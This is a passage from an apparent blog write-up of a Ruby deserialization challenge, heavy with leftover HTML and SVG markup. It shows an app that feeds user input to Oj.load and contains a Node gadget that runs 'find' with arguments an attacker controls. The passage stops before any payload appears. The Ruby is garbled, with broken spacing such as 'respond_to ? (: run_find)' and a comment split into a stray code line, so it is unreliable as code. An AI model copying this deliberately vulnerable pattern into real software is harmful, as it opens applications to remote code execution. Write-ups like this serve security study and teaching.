Initial Ruby Application Code:<\/p>\n\n\n\n
require \"active_record\"\nrequire \"securerandom\"\nrequire \"sqlite3\"\nrequire \"open3\"\nrequire \"erb\"\nrequire \"uri\"\nrequire \"oj\"\n\nDir.chdir('\/tmp\/app')\n\n# Database setup\nActiveRecord::Schema.verbose = false\nActiveRecord::Base.establish_connection(\n adapter: \"sqlite3\",\n database: \":memory:\"\n)\nActiveRecord::Base.connection.disable_query_cache!\n ActiveRecord::Schema.define do\n unless ActiveRecord::Base.connection.table_exists ? (: jobs)\n create_table: jobs do | t |\n t.string: uuid, null: false,\n default: SecureRandom.uuid\n t.string: status, null: false,\n default: \"queued\"\nt.text: payload, null: false\nt.timestamps\nend\nend\nend\n\nclass Job < ActiveRecord::Base\nend\n\n# Clean up old jobs(\n if any)\nJob.delete_all\n\nclass RubitMQ\ndef initialize(data)\n@data = data\nend\n\ndef run\nif @data.respond_to ? (: run_find)\n@data.run_find\nend\nend\nend\n\nclass JobRunner\ndef self.run\nJob.where(status: \"queued\").find_each do | job |\n data = Oj.load(job.payload)\n\n RubitMQ.new(data).run()\n\njob.update!(status: \"done\")\nend\nend\nend\n\nclass Node\ndef initialize(args = [])\n@args = args\nend\n\ndef run_find()\nputs Open3.capture3(\"find\", * @args)\nend\nend\n\npayload = URI.decode_www_form_component(\"\")\n\n# Add the job to the local database\njob = Job.create!(status: \"queued\", payload: payload)\n\nActiveRecord::Base.uncached do\n JobRunner.run\n end\n\n# Render the given page\nfor our web application\nputs ERB.new(IO.read(\"views\/index.html\")).result_with_hash({\n job_name: job.uuid\n})<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">require<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">active_record<\/span><span style=\"color: #ECEFF4\">"<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">require<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">securerandom<\/span><span style=\"color: #ECEFF4\">"<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">require<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">sqlite3<\/span><span style=\"color: #ECEFF4\">"<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">require<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">open3<\/span><span style=\"color: #ECEFF4\">"<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">require<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">erb<\/span><span style=\"color: #ECEFF4\">"<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">require<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">uri<\/span><span style=\"color: #ECEFF4\">"<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">require<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">oj<\/span><span style=\"color: #ECEFF4\">"<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #8FBCBB\">Dir<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">chdir<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">'<\/span><span style=\"color: #A3BE8C\">\/tmp\/app<\/span><span style=\"color: #ECEFF4\">'<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #616E88\"># Database setup<\/span><\/span>\n<span class=\"line\"><span style=\"color: #8FBCBB\">ActiveRecord<\/span><span style=\"color: #ECEFF4\">::<\/span><span style=\"color: #8FBCBB\">Schema<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">verbose <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">false<\/span><\/span>\n<span class=\"line\"><span style=\"color: #8FBCBB\">ActiveRecord<\/span><span style=\"color: #ECEFF4\">::<\/span><span style=\"color: #8FBCBB\">Base<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">establish_connection<\/span><span style=\"color: #ECEFF4\">(<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> adapter<\/span><span style=\"color: #ECEFF4\">:<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">sqlite3<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> database<\/span><span style=\"color: #ECEFF4\">:<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">:memory:<\/span><span style=\"color: #ECEFF4\">"<\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #8FBCBB\">ActiveRecord<\/span><span style=\"color: #ECEFF4\">::<\/span><span style=\"color: #8FBCBB\">Base<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">connection<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">disable_query_cache!<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">ActiveRecord<\/span><span style=\"color: #ECEFF4\">::<\/span><span style=\"color: #8FBCBB\">Schema<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">define <\/span><span style=\"color: #81A1C1\">do<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">unless<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">ActiveRecord<\/span><span style=\"color: #ECEFF4\">::<\/span><span style=\"color: #8FBCBB\">Base<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">connection<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">table_exists <\/span><span style=\"color: #81A1C1\">?<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">(:<\/span><span style=\"color: #D8DEE9FF\"> jobs<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> create_table<\/span><span style=\"color: #ECEFF4\">:<\/span><span style=\"color: #D8DEE9FF\"> jobs <\/span><span style=\"color: #81A1C1\">do<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">|<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #D8DEE9\">t<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> t<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">string<\/span><span style=\"color: #ECEFF4\">:<\/span><span style=\"color: #D8DEE9FF\"> uuid<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> null<\/span><span style=\"color: #ECEFF4\">:<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">false<\/span><span style=\"color: #ECEFF4\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> default<\/span><span style=\"color: #ECEFF4\">:<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">SecureRandom<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">uuid<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> t<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">string<\/span><span style=\"color: #ECEFF4\">:<\/span><span style=\"color: #D8DEE9FF\"> status<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> null<\/span><span style=\"color: #ECEFF4\">:<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">false<\/span><span style=\"color: #ECEFF4\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> default<\/span><span style=\"color: #ECEFF4\">:<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">queued<\/span><span style=\"color: #ECEFF4\">"<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">t<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">text<\/span><span style=\"color: #ECEFF4\">:<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> null<\/span><span style=\"color: #ECEFF4\">:<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">false<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">t<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">timestamps<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">end<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">end<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">end<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">class<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">Job<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\"><<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB; font-weight: bold\">ActiveRecord::Base<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">end<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #616E88\"># Clean up old jobs(<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">if<\/span><span style=\"color: #D8DEE9FF\"> any<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #8FBCBB\">Job<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">delete_all<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">class<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">RubitMQ<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">def<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">initialize<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9\">data<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">@<\/span><span style=\"color: #D8DEE9\">data<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> data<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">end<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">def<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">run<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">if<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">@<\/span><span style=\"color: #D8DEE9\">data<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">respond_to <\/span><span style=\"color: #81A1C1\">?<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">(:<\/span><span style=\"color: #D8DEE9FF\"> run_find<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">@<\/span><span style=\"color: #D8DEE9\">data<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">run_find<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">end<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">end<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">end<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">class<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">JobRunner<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">def<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">self.run<\/span><\/span>\n<span class=\"line\"><span style=\"color: #8FBCBB\">Job<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">where<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">status<\/span><span style=\"color: #ECEFF4\">:<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">queued<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">).<\/span><span style=\"color: #D8DEE9FF\">find_each <\/span><span style=\"color: #81A1C1\">do<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">|<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #D8DEE9\">job<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> data <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">Oj<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">load<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">job<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">payload<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">RubitMQ<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #81A1C1\">new<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">data<\/span><span style=\"color: #ECEFF4\">).<\/span><span style=\"color: #D8DEE9FF\">run<\/span><span style=\"color: #ECEFF4\">()<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">job<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">update!<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">status<\/span><span style=\"color: #ECEFF4\">:<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">done<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">end<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">end<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">end<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">class<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">Node<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">def<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">initialize<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9\">args<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">[])<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">@<\/span><span style=\"color: #D8DEE9\">args<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> args<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">end<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">def<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">run_find<\/span><span style=\"color: #ECEFF4\">()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">Open3<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">capture3<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">find<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">@<\/span><span style=\"color: #D8DEE9\">args<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">end<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">end<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">URI<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">decode_www_form_component<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">""<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #616E88\"># Add the job to the local database<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">job <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">Job<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">create!<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">status<\/span><span style=\"color: #ECEFF4\">:<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">queued<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">:<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #8FBCBB\">ActiveRecord<\/span><span style=\"color: #ECEFF4\">::<\/span><span style=\"color: #8FBCBB\">Base<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">uncached <\/span><span style=\"color: #81A1C1\">do<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">JobRunner<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">run<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">end<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #616E88\"># Render the given page<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">for<\/span><span style=\"color: #D8DEE9FF\"> our web application<\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">ERB<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #81A1C1\">new<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #8FBCBB\">IO<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">read<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">views\/index.html<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">)).<\/span><span style=\"color: #D8DEE9FF\">result_with_hash<\/span><span style=\"color: #ECEFF4\">({<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> job_name<\/span><span style=\"color: #ECEFF4\">:<\/span><span style=\"color: #D8DEE9FF\"> job<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">uuid<\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">})<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>The application processes user-supplied data by storing it as a job payload and deserializing it using the Ruby <code>Oj<\/code> library:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>data = Oj.load(job.payload)<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #D8DEE9FF\">data <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">Oj<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">load<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">job<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">payload<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>The deserialized object is then passed into a message handler which conditionally executes a method:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>RubitMQ.new(data).run<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #8FBCBB\">RubitMQ<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #81A1C1\">new<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">data<\/span><span style=\"color: #ECEFF4\">).<\/span><span style=\"color: #D8DEE9FF\">run<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>The <code>Oj<\/code> library supports object deserialization when special keys such as <code>^o<\/code> are present in JSON input. Because user input is directly passed to <code>Oj.load<\/code> without validation or restrictions.<\/p>\n\n\n\n<p>By analyzing the code, I found the following class<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" 